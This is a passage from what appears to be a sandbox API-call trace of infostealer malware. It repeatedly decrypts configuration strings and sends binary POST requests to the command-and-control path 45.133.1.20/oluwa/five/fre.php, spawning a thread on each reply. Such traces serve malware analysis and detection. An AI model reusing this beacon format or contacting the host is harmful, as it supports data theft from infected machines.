[0193.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.780] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0193.781] GetProcessHeap () returned 0x6a0000 [0193.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0193.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.782] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0193.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.783] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0193.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.784] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0193.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.786] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0193.786] GetProcessHeap () returned 0x6a0000 [0193.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0193.786] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0193.786] GetProcessHeap () returned 0x6a0000 [0193.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0193.786] socket (af=2, type=1, protocol=6) returned 0x4c4 [0193.786] connect (s=0x4c4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0193.813] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0193.813] GetProcessHeap () returned 0x6a0000 [0193.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0193.813] GetProcessHeap () returned 0x6a0000 [0193.813] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0193.814] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0193.815] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0193.815] GetProcessHeap () returned 0x6a0000 [0193.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0193.815] GetProcessHeap () returned 0x6a0000 [0193.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0193.816] GetProcessHeap () returned 0x6a0000 [0193.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0193.816] GetProcessHeap () returned 0x6a0000 [0193.816] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0193.817] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0193.821] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0193.821] GetProcessHeap () returned 0x6a0000 [0193.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0193.821] GetProcessHeap () returned 0x6a0000 [0193.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0193.821] send (s=0x4c4, buf=0x6b5c98*, len=242, flags=0) returned 242 [0193.822] send (s=0x4c4, buf=0x6bb998*, len=159, flags=0) returned 159 [0193.822] GetProcessHeap () returned 0x6a0000 [0193.822] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0193.822] recv (in: s=0x4c4, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0193.900] GetProcessHeap () returned 0x6a0000 [0193.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0193.900] GetProcessHeap () returned 0x6a0000 [0193.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0193.901] GetProcessHeap () returned 0x6a0000 [0193.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0193.902] GetProcessHeap () returned 0x6a0000 [0193.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0193.902] closesocket (s=0x4c4) returned 0 [0193.903] GetProcessHeap () returned 0x6a0000 [0193.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0193.903] GetProcessHeap () returned 0x6a0000 [0193.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0193.903] GetProcessHeap () returned 0x6a0000 [0193.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0193.904] GetProcessHeap () returned 0x6a0000 [0193.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0193.904] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12c0) returned 0x4c4 [0193.906] Sleep (dwMilliseconds=0xea60) [0193.908] GetProcessHeap () returned 0x6a0000 [0193.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0193.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.909] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0193.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.916] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0193.928] GetProcessHeap () returned 0x6a0000 [0193.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c5988 [0193.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.932] CryptImportKey (in: hProv=0x6bf278, pbData=0x6c5988, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0193.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.933] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0193.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.934] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0193.934] GetProcessHeap () returned 0x6a0000 [0193.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5988 | out: hHeap=0x6a0000) returned 1 [0193.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.935] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0193.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.936] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0193.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.937] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0193.937] GetProcessHeap () returned 0x6a0000 [0193.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0193.938] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.939] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0193.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.940] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0193.959] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.962] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0193.963] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0193.964] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0193.964] GetProcessHeap () returned 0x6a0000 [0193.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0193.978] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0193.979] GetProcessHeap () returned 0x6a0000 [0193.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0193.980] GetProcessHeap () returned 0x6a0000 [0193.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0193.981] GetProcessHeap () returned 0x6a0000 [0193.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0193.981] GetProcessHeap () returned 0x6a0000 [0193.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0193.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.983] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0193.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0193.994] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0194.034] GetProcessHeap () returned 0x6a0000 [0194.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0194.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.035] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0194.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.037] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0194.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.038] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0194.038] GetProcessHeap () returned 0x6a0000 [0194.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0194.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.039] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0194.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.041] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0194.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.042] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0194.042] GetProcessHeap () returned 0x6a0000 [0194.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0194.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.045] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0194.046] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.047] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0194.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.048] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0194.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.049] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0194.049] GetProcessHeap () returned 0x6a0000 [0194.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0194.049] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0194.049] GetProcessHeap () returned 0x6a0000 [0194.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0194.050] socket (af=2, type=1, protocol=6) returned 0x4c8 [0194.050] connect (s=0x4c8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0194.087] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0194.087] GetProcessHeap () returned 0x6a0000 [0194.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0194.087] GetProcessHeap () returned 0x6a0000 [0194.087] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0194.118] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0194.120] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0194.120] GetProcessHeap () returned 0x6a0000 [0194.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0194.120] GetProcessHeap () returned 0x6a0000 [0194.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0194.120] GetProcessHeap () returned 0x6a0000 [0194.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0194.120] GetProcessHeap () returned 0x6a0000 [0194.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0194.121] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0194.122] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0194.122] GetProcessHeap () returned 0x6a0000 [0194.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0194.122] GetProcessHeap () returned 0x6a0000 [0194.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0194.123] send (s=0x4c8, buf=0x6b5c98*, len=242, flags=0) returned 242 [0194.123] send (s=0x4c8, buf=0x6bb998*, len=159, flags=0) returned 159 [0194.124] GetProcessHeap () returned 0x6a0000 [0194.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0194.124] recv (in: s=0x4c8, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0194.204] GetProcessHeap () returned 0x6a0000 [0194.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0194.205] GetProcessHeap () returned 0x6a0000 [0194.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0194.206] GetProcessHeap () returned 0x6a0000 [0194.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0194.207] GetProcessHeap () returned 0x6a0000 [0194.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0194.207] closesocket (s=0x4c8) returned 0 [0194.208] GetProcessHeap () returned 0x6a0000 [0194.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0194.208] GetProcessHeap () returned 0x6a0000 [0194.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0194.208] GetProcessHeap () returned 0x6a0000 [0194.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0194.209] GetProcessHeap () returned 0x6a0000 [0194.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0194.209] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc6c) returned 0x4c8 [0194.213] Sleep (dwMilliseconds=0xea60) [0194.214] GetProcessHeap () returned 0x6a0000 [0194.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0194.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.216] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0194.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.224] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0194.235] GetProcessHeap () returned 0x6a0000 [0194.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0194.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.236] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0194.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.242] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0194.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.243] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0194.243] GetProcessHeap () returned 0x6a0000 [0194.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0194.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.249] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0194.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.250] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0194.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.251] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0194.251] GetProcessHeap () returned 0x6a0000 [0194.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0194.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.252] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0194.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.254] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0194.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.260] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0194.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.261] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0194.261] GetProcessHeap () returned 0x6a0000 [0194.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0194.261] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0194.262] GetProcessHeap () returned 0x6a0000 [0194.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0194.262] GetProcessHeap () returned 0x6a0000 [0194.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0194.263] GetProcessHeap () returned 0x6a0000 [0194.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0194.263] GetProcessHeap () returned 0x6a0000 [0194.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0194.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.264] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0194.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.298] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0194.329] GetProcessHeap () returned 0x6a0000 [0194.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0194.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.363] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0194.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.364] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0194.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.365] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0194.365] GetProcessHeap () returned 0x6a0000 [0194.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0194.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.367] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0194.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.368] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0194.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0194.369] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0194.370] GetProcessHeap () returned 0x6a0000 [0194.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0194.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.371] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0194.371] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.372] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0194.372] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0194.373] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0194.373] LoadLibraryW 